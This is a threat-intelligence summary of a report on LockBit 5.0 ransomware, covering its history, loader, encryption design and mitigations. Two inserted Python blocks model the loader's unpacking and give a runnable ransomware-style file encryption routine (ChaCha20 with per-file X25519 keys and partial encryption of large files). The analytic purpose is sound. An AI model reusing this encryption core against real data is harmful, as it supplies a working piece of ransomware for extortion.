✅ Report Title: Threat Group Profiling: LockBit 5.0
✅ Executive Summary:
📌 Who Is the LockBit Group?
- The LockBit ransomware group began independent operations in September 2019 under the name ABCD ransomware and released LockBit 5.0 in September 2025.
📌 DDW (Deep and Dark Web) History
- LockBit's DLS (Data Leak Site) showed no activity after May 2025. With the release of LockBit 5.0 in September 2025, however, the group significantly lowered the barrier to entry by setting the affiliate sign-up fee at $500.
- After a reorganization period, it resumed activity in December 2025 and showed signs of restarting operations on the XSS and RAMP forums.
📌 Detailed Analysis of LockBit 5.0 Ransomware
- LockBit 5.0 ransomware, also known as the ChoungDong version, consists of two components: a Loader and the Ransomware itself.
- Loader: XOR-decrypts and LZ-decompresses the embedded ransomware payload, then executes it in memory rather than dropping it to disk.
- Ransomware: Encrypts files with ChaCha20, with the key material protected by Curve25519; the encryption routine selected depends on file size, with 80MB as the boundary the report identifies.
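The loader's unpack step is the point where an analyst recovers the real ransomware image. The following is an added Python model of that step, not code from the report or from LockBit: it uses zlib as a stand-in for the loader's unnamed LZ variant, assumes a short repeating XOR key, and packs a constructed PE-like byte string. It also shows the usual analyst shortcut for an unknown single-byte XOR key: try every key and keep the one whose output decompresses cleanly to an "MZ" header.

```python
import zlib
from typing import Optional

MZ = b"MZ"  # DOS header magic that every PE image starts with


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same operation encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_packed_payload(payload: bytes, key: bytes) -> bytes:
    """Packer side as assumed here: LZ-compress first, then XOR-encrypt.
    zlib stands in for the loader's LZ variant, which the page does not name."""
    return xor_bytes(zlib.compress(payload), key)


def unpack_payload(blob: bytes, key: bytes) -> bytes:
    """Mirror of the loader: XOR-decrypt, then decompress. The result is the
    in-memory image an analyst would dump instead of looking for a dropped file."""
    return zlib.decompress(xor_bytes(blob, key))


def recover_single_byte_key(blob: bytes) -> Optional[int]:
    """Analyst helper for an unknown 1-byte key: a candidate is accepted only if
    decompression succeeds AND the output looks like a PE image ('MZ')."""
    for k in range(256):
        try:
            out = zlib.decompress(xor_bytes(blob, bytes([k])))
        except zlib.error:
            continue
        if out.startswith(MZ):
            return k
    return None


if __name__ == "__main__":
    # Constructed sample: a fake PE-like payload, not a real binary.
    fake_pe = MZ + b"\x90" * 64 + b"This program cannot be run in DOS mode."
    packed = build_packed_payload(fake_pe, b"\x5a")
    key = recover_single_byte_key(packed)
    print("recovered key: 0x%02x" % key)
    print("payload starts with MZ:", unpack_payload(packed, bytes([key])).startswith(MZ))
```

Because the decoded payload only ever exists in memory, file-based antivirus scanning sees the packed loader, not the ransomware; this is why the report's recommendation to monitor process behavior matters more than file signatures for this family.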
📌 Differences From LockBit 4.0
- The update from LockBit 4.0 to 5.0 significantly strengthens analysis evasion and attack efficiency. It adds numerous new features, such as a Mutex, Execution Delay, a Status bar, Delete TEMP, and a Wiper, while also overhauling the volume shadow copy deletion method and the large-file encryption logic.
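To make the ChaCha20 + Curve25519 scheme and the size-dependent encryption logic concrete, here is an added Python model of the generic hybrid construction such ransomware uses. It is not the report's reverse-engineered code and not LockBit's: the pure-Python ChaCha20 (RFC 8439) and X25519 (RFC 7748) are included so the block runs with no third-party packages, and the exact details are assumptions: a fresh X25519 key pair per file, SHA-256 of the shared secret as the file key, and, for files at or above the 80MB boundary the report names, encryption of only a leading chunk (the HEAD_BYTES size is invented for illustration).

```python
import hashlib
import os
import struct

M32 = 0xFFFFFFFF
P = 2**255 - 19                       # Curve25519 field prime
BASEPOINT = (9).to_bytes(32, "little")
SIZE_THRESHOLD = 80 * 1024 * 1024    # 80MB boundary named in the report
HEAD_BYTES = 1024 * 1024             # assumed: above the threshold only this prefix is encrypted


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & M32


def _quarter_round(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & M32; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & M32; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & M32; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & M32; s[b] = _rotl(s[b] ^ s[c], 7)


def chacha20_block(key, counter, nonce):
    """One 64-byte keystream block (RFC 8439 state: constants, key, counter, 12-byte nonce)."""
    state = list(struct.unpack("<16I", b"expand 32-byte k" + key + struct.pack("<I", counter) + nonce))
    w = state[:]
    for _ in range(10):  # 20 rounds = 10 double rounds (column + diagonal)
        _quarter_round(w, 0, 4, 8, 12); _quarter_round(w, 1, 5, 9, 13)
        _quarter_round(w, 2, 6, 10, 14); _quarter_round(w, 3, 7, 11, 15)
        _quarter_round(w, 0, 5, 10, 15); _quarter_round(w, 1, 6, 11, 12)
        _quarter_round(w, 2, 7, 8, 13); _quarter_round(w, 3, 4, 9, 14)
    return struct.pack("<16I", *[(x + y) & M32 for x, y in zip(w, state)])


def chacha20_xor(key, nonce, data, counter=0):
    """Stream-cipher XOR; the same call encrypts and decrypts."""
    out = bytearray()
    for i in range(0, len(data), 64):
        block = chacha20_block(key, counter + i // 64, nonce)
        out += bytes(x ^ y for x, y in zip(data[i:i + 64], block))
    return bytes(out)


def x25519(scalar, u):
    """RFC 7748 Montgomery ladder (plain Python, not constant-time; analysis use only)."""
    k = bytearray(scalar); k[0] &= 248; k[31] &= 127; k[31] |= 64   # clamp
    k = int.from_bytes(k, "little")
    x1 = int.from_bytes(u, "little") & ((1 << 255) - 1)
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):
        bit = (k >> t) & 1
        swap ^= bit
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = bit
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        da, cb = (x3 - z3) * a % P, (x3 + z3) * b % P
        x3, z3 = (da + cb) ** 2 % P, x1 * (da - cb) ** 2 % P
        x2, z2 = aa * bb % P, e * (aa + 121665 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")


def encrypt_file(data, attacker_pub, threshold=SIZE_THRESHOLD, head=HEAD_BYTES, rng=os.urandom):
    """Victim side: ephemeral X25519 key per file, shared secret hashed into the ChaCha20
    key. The ephemeral private key is discarded, so nothing on the host can rebuild the key."""
    eph_priv = rng(32)
    eph_pub = x25519(eph_priv, BASEPOINT)
    file_key = hashlib.sha256(x25519(eph_priv, attacker_pub)).digest()
    nonce = rng(12)
    # Size-dependent strategy (assumed shape): small files fully, large files only a leading chunk.
    n = len(data) if len(data) < threshold else min(len(data), head)
    body = chacha20_xor(file_key, nonce, data[:n]) + data[n:]
    return eph_pub + nonce + struct.pack("<Q", n) + body


def decrypt_file(blob, attacker_priv):
    """Decryptor side: only the attacker's private key recovers the per-file key."""
    eph_pub, nonce = blob[:32], blob[32:44]
    n = struct.unpack("<Q", blob[44:52])[0]
    file_key = hashlib.sha256(x25519(attacker_priv, eph_pub)).digest()
    return chacha20_xor(file_key, nonce, blob[52:52 + n]) + blob[52 + n:]


if __name__ == "__main__":
    attacker_priv = os.urandom(32)
    attacker_pub = x25519(attacker_priv, BASEPOINT)
    doc = b"constructed sample document " * 100   # constructed input
    enc = encrypt_file(doc, attacker_pub)
    print("roundtrip ok:", decrypt_file(enc, attacker_priv) == doc)
```

The practical consequence for responders: since every file carries its own ephemeral public key and the ChaCha20 key is derived from a Curve25519 exchange with the attacker's key, memory dumps or disk forensics on the victim cannot yield a master key, and a partially encrypted large file is unusable even though most of its bytes are intact.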
✅ Recommended Threat Detection and Mitigation Actions:
- Continuously monitor process behavior and anomalous activity to block malicious file execution and lateral movement inside the network. Keep antivirus software and security patches up to date to minimize intrusion through known vulnerabilities.
- Establish cyber attack response and security enhancement measures using the IoCs, detection rules, and MITRE ATT&CK mapping provided in the report, and be prepared to respond swiftly in the event of a security breach.
👉 Read the full report: https://bit.ly/49uamlP
🧑‍💻 Author: S2W TALON
*The full report is available upon request or with a subscription to the S2W platform.